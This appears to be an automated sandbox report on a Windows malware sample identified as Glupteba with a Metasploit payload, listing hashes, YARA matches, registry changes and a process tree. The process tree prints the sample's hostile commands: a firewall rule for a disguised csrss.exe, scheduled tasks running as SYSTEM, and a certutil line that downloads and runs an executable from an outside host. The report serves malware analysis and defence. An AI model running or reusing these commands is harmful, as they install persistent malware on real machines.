Analysis
-
max time kernel
163s -
max time network
168s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
14-06-2022 20:03
Static task
static1
Behavioral task
behavioral1
Sample
2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe
Resource
win10v2004-20220414-en
General
-
Target
2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe
-
Size
3.8MB
-
MD5
0008ce45286bd379fd0ca42e9fb79b0d
-
SHA1
36a1027956ca5db32a88ae77cae4451407d5cf06
-
SHA256
2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae
-
SHA512
24ae62addfe69e9f79011d206b52c12a21503227eb387313ad597a5b043e6a718c9be92e884c184fed75e5b3e7f9e7debe106856d235e945ab26ec9612098f6d
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba Payload 7 IoCs
Processes:
resource yara_rule behavioral2/memory/5076-131-0x0000000003BC0000-0x00000000043C2000-memory.dmp family_glupteba behavioral2/memory/5076-132-0x0000000000400000-0x000000000334F000-memory.dmp family_glupteba behavioral2/memory/5076-134-0x0000000000400000-0x000000000334F000-memory.dmp family_glupteba behavioral2/memory/5068-138-0x0000000000400000-0x000000000334F000-memory.dmp family_glupteba behavioral2/memory/5068-142-0x0000000000400000-0x000000000334F000-memory.dmp family_glupteba behavioral2/memory/4976-146-0x0000000000400000-0x000000000334F000-memory.dmp family_glupteba behavioral2/memory/4976-150-0x0000000000400000-0x000000000334F000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
svchost.exedescription pid process target process PID 4180 created 5076 4180 svchost.exe 2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe PID 4180 created 4976 4180 svchost.exe csrss.exe PID 4180 created 4976 4180 svchost.exe csrss.exe PID 4180 created 4976 4180 svchost.exe csrss.exe -
Executes dropped EXE 2 IoCs
Processes:
csrss.exepatch.exepid process 4976 csrss.exe 1964 patch.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BillowingMoon = "\"C:\\Windows\\rss\\csrss.exe\"" 2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 4120 bcdedit.exe -
Drops file in Windows directory 2 IoCs
Processes:
2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exedescription ioc process File opened for modification C:\Windows\rss 2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe File created C:\Windows\rss\csrss.exe 2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3484 schtasks.exe 4712 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
csrss.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" csrss.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.execsrss.exepid process 5076 2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe 5076 2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe 5068 2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe 5068 2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe 4976 csrss.exe 4976 csrss.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
Processes:
2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exesvchost.execsrss.exedescription pid process Token: SeDebugPrivilege 5076 2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe Token: SeImpersonatePrivilege 5076 2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe Token: SeTcbPrivilege 4180 svchost.exe Token: SeTcbPrivilege 4180 svchost.exe Token: SeBackupPrivilege 4180 svchost.exe Token: SeRestorePrivilege 4180 svchost.exe Token: SeBackupPrivilege 4180 svchost.exe Token: SeRestorePrivilege 4180 svchost.exe Token: SeSystemEnvironmentPrivilege 4976 csrss.exe Token: SeBackupPrivilege 4180 svchost.exe Token: SeRestorePrivilege 4180 svchost.exe Token: SeBackupPrivilege 4180 svchost.exe Token: SeRestorePrivilege 4180 svchost.exe Token: SeBackupPrivilege 4180 svchost.exe Token: SeRestorePrivilege 4180 svchost.exe Token: SeBackupPrivilege 4180 svchost.exe Token: SeRestorePrivilege 4180 svchost.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
svchost.exe2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.execmd.execsrss.exedescription pid process target process PID 4180 wrote to memory of 5068 4180 svchost.exe 2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe PID 4180 wrote to memory of 5068 4180 svchost.exe 2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe PID 4180 wrote to memory of 5068 4180 svchost.exe 2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe PID 5068 wrote to memory of 2096 5068 2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe cmd.exe PID 5068 wrote to memory of 2096 5068 2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe cmd.exe PID 2096 wrote to memory of 4540 2096 cmd.exe netsh.exe PID 2096 wrote to memory of 4540 2096 cmd.exe netsh.exe PID 5068 wrote to memory of 4976 5068 2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe csrss.exe PID 5068 wrote to memory of 4976 5068 2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe csrss.exe PID 5068 wrote to memory of 4976 5068 2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe csrss.exe PID 4180 wrote to memory of 4712 4180 svchost.exe schtasks.exe PID 4180 wrote to memory of 4712 4180 svchost.exe schtasks.exe PID 4180 wrote to memory of 3484 4180 svchost.exe schtasks.exe PID 4180 wrote to memory of 3484 4180 svchost.exe schtasks.exe PID 4180 wrote to memory of 1964 4180 svchost.exe patch.exe PID 4180 wrote to memory of 1964 4180 svchost.exe patch.exe PID 4976 wrote to memory of 4120 4976 csrss.exe bcdedit.exe PID 4976 wrote to memory of 4120 4976 csrss.exe bcdedit.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe"C:\Users\Admin\AppData\Local\Temp\2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5076 -
C:\Users\Admin\AppData\Local\Temp\2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe"C:\Users\Admin\AppData\Local\Temp\2d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae.exe"2⤵
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:4540
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
PID:3484
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
PID:4712
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
- Executes dropped EXE
PID:1964
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
PID:4120
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4180
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
Filesize
3.8MB
MD50008ce45286bd379fd0ca42e9fb79b0d
SHA136a1027956ca5db32a88ae77cae4451407d5cf06
SHA2562d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae
SHA51224ae62addfe69e9f79011d206b52c12a21503227eb387313ad597a5b043e6a718c9be92e884c184fed75e5b3e7f9e7debe106856d235e945ab26ec9612098f6d
-
Filesize
3.8MB
MD50008ce45286bd379fd0ca42e9fb79b0d
SHA136a1027956ca5db32a88ae77cae4451407d5cf06
SHA2562d3d52fb83e527fc9028357e066f4b3325c7686f018a154890511316d8e2aeae
SHA51224ae62addfe69e9f79011d206b52c12a21503227eb387313ad597a5b043e6a718c9be92e884c184fed75e5b3e7f9e7debe106856d235e945ab26ec9612098f6d